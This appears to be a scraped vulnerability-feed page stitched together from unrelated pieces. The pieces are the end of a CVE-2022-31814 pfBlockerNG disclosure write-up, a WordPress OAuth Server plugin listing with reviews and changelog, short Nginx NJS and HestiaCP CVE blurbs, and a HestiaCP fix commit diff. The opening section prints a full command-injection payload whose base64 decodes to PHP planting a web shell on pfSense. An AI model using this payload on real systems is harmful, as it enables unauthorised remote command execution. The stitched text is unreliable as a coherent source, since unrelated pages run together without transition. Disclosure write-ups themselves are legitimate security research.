Once again, the above payload, encoded in base64, did not contain any forward slashes. Hence, the final payload to obtain a backdoor in pfSense would be as follow:

    /usr/bin/grep -l ' "' * ; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBlY2hvKGV4ZWMoJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSgkYSk7Pz4=' | python3.8 -m base64 -d | php ; ' 60 IN A' /var/db/pfblockerng/dnsblalias/*

**Exploit Code**

The exploit code can be found at https://iht.li/p/WWATN

Fig 6: Image showing the exploit execution

**Disclosure Timeline**

28/05/2022 – Technical details sent to \[email protected\]  
31/05/2022 – No response from NetGate, directly contacted BBcan177 (maintainer of the package in GitHub)  
05/06/2022 – BBcan177 released a temporary patch https://github.com/pfsense/FreeBSD-ports/pull/1169 while waiting to deprecate version 2.x in favor of 3.x  
07/06/2022 – NetGate came back saying they don’t issue security advisories for vulnerabilities within Packages, especially community-maintained packages such as pfBlockerNG.  
–3 months delay to allow clients to patch–  
05/09/2022 – Blog post and exploit published

CVE-2022-31814: pfBlockerNG Unauth RCE Vulnerability - IHTeam Security Blog

Authentication Bypass vulnerability in miniOrange WP OAuth Server plugin <= 3.0.4 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

WP OAuth Server plugin turns your WordPress site into an OAuth Server. It allows you to login into Rocket Chat, Invision Community, WordPress, Odoo, EasyGenerator, Salesforce, Zapier, Moodle, Edunext, Wickr, Freshdesk, FreshWorks, ServiceNow, Knack database, Circlo.so, Tribe.so, Tribe, Mobilize, Nextcloud, Church Online, iSpring LMS, Nextcloud, Academy of Mine, BoardEffect, TalentLMS, PowerSchool and any other OAuth 2.0 compliant applications using WordPress credentials.

Basically, the OAuth Server plugin allows users to login into applications that are OAuth 2.0 compliant, using their WordPress login credentials. As it’s name suggests, it follows the OAuth 2.0 protocol. Along with that, it also supports OpenID Connect (OIDC), and JWT protocols.

The primary goal of the OAuth Server plugin is to enable Single Sign On so that users do not need to remember username and password for each application.  
Once Single Sign On is enabled, users do not need to store sensitive information to login into different applications.

**LIST OF POPULAR OAUTH CLIENTS SUPPORTED**

*   Rocket.Chat
*   Invision Community (IPB Forum)
*   Odoo
*   WordPress
*   EasyGenerator
*   Salesforce
*   Zapier
*   Moodle
*   Edunext
*   Wickr
*   Freshdesk
*   FreshWorks
*   ServiceNow
*   Knack database
*   Circle.so
*   Tribe.so
*   Mobilize
*   Nextcloud
*   iSpring LMS
*   Church Online
*   Academy of Mine
*   BoardEffect

**WORDPRESS OAUTH / OPENID CONNECT SERVER USE CASES**

*   If you want to use your WordPress site as an Identity Server / OAuth Server / OAuth Provider and use WordPress user’s login credentials to login into your client site / application then you can use this plugin. You can also decide what kind of User data / attributes you want to send while Single Sign On into your client site / application.
*   If you want to login to your Mobile app / Single Page web app (SPA) using your WordPress credentials, then you can use the Authorization code with PKCE flow grant type to achieve your use case.
*   Single set of credentials will be used to login to multiple WordPress websites.
*   You can access the NIGINX resources using NIGINX Authentication. Once you login into your client application using WP OAuth Server credentials, you will get JWT. Your client application can further use it for NGINX Authentication.

**WORDPRESS OAUTH / OPENID CONNECT SERVER FREE VERSION FEATURES**

*   Supports Login with WordPress for Single Client application
*   Protocol Support – OAuth 2.0, OpenID Connect (OIDC)
*   Master Switch – Block / unblock OAuth API calls between OAuth Clients and Server
*   Token Length – Change the access token length
*   Server Response – Sends User ID, username, email, first name, last name, display name in the response
*   Grant types Supported – Authorization Code grant
*   OAuth API Documentation
*   Setup guides to configure the plugin with various OAuth Clients (more coming soon)

**WORDPRESS OAUTH / OPENID CONNECT SERVER PREMIUM VERSION FEATURES**

*   All FREE version features
*   Supports Login with WordPress for Multiple Client applications
*   Server Response – Sends all the profile attributes along with roles, allows to send custom attributes from usermeta table and also customize the attribute names that need to be sent in server response
*   Grant Types Supported : Authorization Code Grant, Implicit Grant, Password Grant, Client Credentials Grant, Refresh Token Grant, Authorization Code grant with PKCE flow
*   Token Lifetime – Configure the access token and refresh token expiry time
*   Enforce State Parameter – Based on client configuration, you can enable or disable state parameter
*   Authorize / Consent prompt – Enable / disable the consent screen
*   Redirect/Callback URI Validation – Enable / disable this feature, based on dynamic redirect to a different pages for certain conditions
*   Multi-Site Support – Use the plugin in WordPress Multisite network environment
*   JWT Signing Algorithm – Supports signing algorithms HSA and RSA
*   Additional endpoints – Provides OpenID Connect Discovery endpoint, Introspection endpoint, OpenID Connect Single logout endpoint  
    A grant is a method of acquiring an access token. Deciding which grants to implement depends on the type of client the end user will be using, and the experience you want for your users.

**WE SUPPORT FOLLOWING GRANTS:**

*   **Authorization code grant** : This code grant is used when there is a need to access the protected resources on behalf of the user on another third party application.
*   **Implicit grant** : This grant relies on resource owner and registration of redirect uri. In authorization code grant users need to ask for authorization and access token each time, but here access token is granted for a particular redirect uri provided by a client using a particular browser.
*   **Client credential grant** : This grant type heads towards specific clients, where access token is obtained by client by only providing client credentials. This grant type is quite confidential.
*   **Resource owner password credentials grant** : This type of grant is used where the resource owner has a trust relationship with the client. Just by using username and password, provided by resource owner authorization and authentication can be achieved.
*   **Refresh token grant** : Access tokens obtained in OAuth flow eventually expire. In this grant type client can refresh his or her access token.
*   **Authorization code grant with PKCE flow** : This grant type is used for public clients like mobile and native apps, Single Page web apps, where there is a risk of client secret being compromised.

**REST API AUTHENTICATION**

Rest API is very much open to interact. Creating posts, getting information of users and much more is readily available.  
It secures unauthorized access to your WordPress sites/pages using our WordPress REST API Authentication plugin .

**From your WordPress dashboard**

1.  Visit Plugins > Add New
2.  Search for OAuth 2.0 server. Find and Install OAuth 2.0 server
3.  Activate the plugin from your Plugins page

**From WordPress.org**

1.  Download OAuth 2.0 server.
2.  Unzip and upload the miniorange-oauth-login directory to your /wp-content/plugins/ directory.
3.  Activate miniOrange OAuth from your Plugins page.

**I need to customize the plugin or I need support and help?**

Please email us at info@xecurify.com or Contact us. You can also submit your query from plugin’s configuration page.

Initial setup was giving my team some issues and we were able to get walked through a drupal to wordpress sso setup with the team at miniorange.

The plugin works without problems, and our Wordpress site's login is now working smooth. Very helpful and capable Support, who has answered in a fast manner. They get directly to the point and answer the questions with rich answers that makes even a (in the context of SSO) less experienced user understand what is happening.

The free version of this plugin worked great for my use case. I had some issues initially that ended up being on the side of my hosting provider, but the support I received by the developers of this plugin was well beyond what I would have expected.

I tried this plugin to link Wordpress with Invision Community (IPS). According to the docs at Invision, there are 2 ways to do this. I chose the first one linking IPS to WP as the server as opposed to IPS acting as the server. My review is based on this experience but I'll try the other way too. It quick and easy to set up, and clearly there's a large amount of work gone into it, but once I'd got the connection configured, that's when I found that the logins expire after just 600 seconds, that's just 10 minutes! According to the support section, it says this is fixed at 3600 seconds, unless you upgrade to the pro. But 10 mins isn't an hour, which would be okay at minimum for a WP site member to browse and compose a comment or review on Gallery images, post in a forum etc in Invision Community forming part of the same site. Secondly, probably 90%+ of this plugin is locked down and almost everything seems to say you need to upgrade to pro. Instead of 7 tabs full of settings and options you can't use, why not create a simpler lite version with a non-intrusive ad for the pro version benefits? If you want a simple Single Sign On OAUTH solution to link your WP user accounts to your IPS accounts and sync basic profile info for the convenience of your visitors but then forget about it, it will do the job but as crippled as it is, this probably isn't what you are looking for, unless you want the pro support and anything beyond the bare minimum.

We were very impressed with the level of support given by the miniorange team. During our development we ran into a few problems due to other plugins and our custom application, which caused problems for logout. However, the miniorange team was great they were quick to respond to our questions and even attended a zoom session with us to help track down the problem. Definitely one of the best plugin authors for support. I've worked with many and these guys are second to none.

We ended up not buying the plugin but we have to admit the pre-sales support was stellar including pro-actively reaching us to help configure it.

Read all 27 reviews

“WP OAuth Server ( Login with WordPress )” is open source software. The following people have contributed to this plugin.

Contributors

**4.0.1**

*   Vulnerability fixes
*   Code improvements

**3.0.4**

*   Token Post Response header already sent warning fix

**3.0.3**

*   Database Query Optimization

**3.0.2**

*   CORS issue fix
*   Added trial option of the premium
*   Licensing page changes

**3.0.1**

*   Added compatibility with WP 5.9
*   Improved performance of website by setting autoload to false

**3.0.0**

*   Support for email attribute in the userinfo endpoint
*   Link to the OAuth API documention
*   Client specific UI improvements

**2.13.8**

*   Security Fixes

**2.13.7**

*   UI improvement – Copy button for endpoints and client credentials
*   Bug fix for supplied\_redirect\_uri
*   Consent screen on every login

**2.13.6**

*   permission\_callback warning fix

**2.13.5**

*   minor bug fixes
*   added copy button to copy the client credentials and endpoints
*   readme update

**2.13.4**

*   minor UI updates
*   added compatibility with WP 5.7

**2.13.3**

*   minor bug fixes
*   fixed compatibility with Brizzy
*   added compatibility with WP 5.6

**2.13.2**

*   minor bug fixes
*   fixed issue with deactivation form
*   added compatibility with WP 5.5

**2.13.1**

*   Added compatibility with WordPress v5.5

**2.13.0**

*   Added UI fixes
*   Updated demo plan fixes
*   Minor bugfixes and compatibility fixes

**2.12.4**

*   Licensing tab fix

**2.12.3**

*   Added fixes for some features
*   Added option to disable authorize screen

**2.12.2**

*   Added Compatibility with WordPress v5.4

**2.12.0**

*   Performance Improvements

**2.11.0**

*   Fixed bug where blank scope led to blank screen
*   Fixed “Deny” button resulting in clicking “Allow”
*   Fixed unaccounted bytes error notice on activation
*   Updated plugin licensing
*   Minor UI Improvements

**2.10.0**

*   Added fixes for Loopback Request failure
*   Updated Endpoints based on REST API and Authorize Consent Screen
*   Minor Bugfixes

**2.9.1**

*   Fixed migration issue

**2.9.0**

*   Fixed bug where bearer access\_token was not recognized.
*   Updated Endpoints

**2.8.2**

*   Updated Installation Steps

**2.8.1**

*   Compatibility changes for miniOrange OAuth Single Sign On

**2.8.0**

*   Updated registration form
*   Advertised Introspection Endpoint

**2.7.0**

*   Added compatibility for WordPress Version 5.2
*   Added fixes for OpenID Connect flow
*   Added fixes for OTP related issue
*   Updated Endpoints
*   Added alternative for Sign Up
*   Advertised Scope Based Response

**2.6.1**

*   Fixed conflicts for function generateRandomString()

**2.6.0**

*   Advertised new features as per new Licensing Plan

**2.5.6**

*   Added Compatibility for Rocket.chat

**2.5.5**

*   Fixed OTP related issue

**2.5.4**

*   Updated Licensing Plan

**2.5.3**

*   Added Visual Tour fixes

**2.5.2**

*   Added bugfixes

**2.5.1**

*   Added missing files

**2.5.0**

*   New Features
*   Major UI Revamp
*   Added Feature Tour

**2.4.0**

*   Compatibility with WordPress 5.1

**2.3.0**

*   Added Feedback Form and Updated UI

**2.2.1**

*   Added support for Invision Community and Rocket.chat

**2.2.0**

*   Updated UI

**2.1.0**

*   Fixed the PHP7.2 Compatibility issue

**2.0.3**

*   Changes in the title

**2.0.2**

*   Added features

**2.0.1**

*   Added support for multiple client

**1.0.1**

*   Initial Release

CVE-2022-34149: WP OAuth Server ( Login with WordPress )

An issue was discovered in Nginx NJS v0.7.5. The JUMP offset for a break instruction was not set to a correct offset during code generation, leading to a segmentation violation.

CVE-2022-35173

An issue was discovered in HestiaCP before v1.3.5. Attackers are able to arbitrarily install packages due to values taken from the pgk [] parameter in the update request being transmitted to the operating system's package manager.

Permalink

Browse files

Merge remote-tracking branch 'jaapmarcus/fix/prevent-install-non-cont…

…rolled-package' into main

*   Loading branch information

Kristan Kenney committed

Mar 30, 2021

2 parents 32ef8a2 + 9a1fccd commit 27556a9a43aeaf308b33be224c2e70f2011574e6

Showing **2 changed files** with **7 additions** and **0 deletions**.

*   *   v-update-sys-hestia
*   *   main.sh

@@ -32,6 +32,7 @@ source $HESTIA/conf/hestia.conf

  

# Checking arg number

check\_args '1' "$#" 'PACKAGE'

is\_hestia\_package "hestia,hestia-nginx,hestia-php" "$package"

  

# Perform verification if read-only mode is enabled

check\_hestia\_demo\_mode

@@ -1154,6 +1154,12 @@ multiphp\_default\_version() {

echo "$sys\_phpversion"

}

  

is\_hestia\_package(){

if \[ \-z "$(echo $1 | grep -w $2)" \]; then

check\_result $E\_INVALID "$2 package is not controlled by hestiacp"

fi

}

  

# Run arbitrary cli commands with dropped privileges

# Note: setpriv --init-groups is not available on debian9 (util-linux 2.29.2)

# Input:

**0 comments on commit 27556a9**

Please sign in to comment.

Tag

#nginx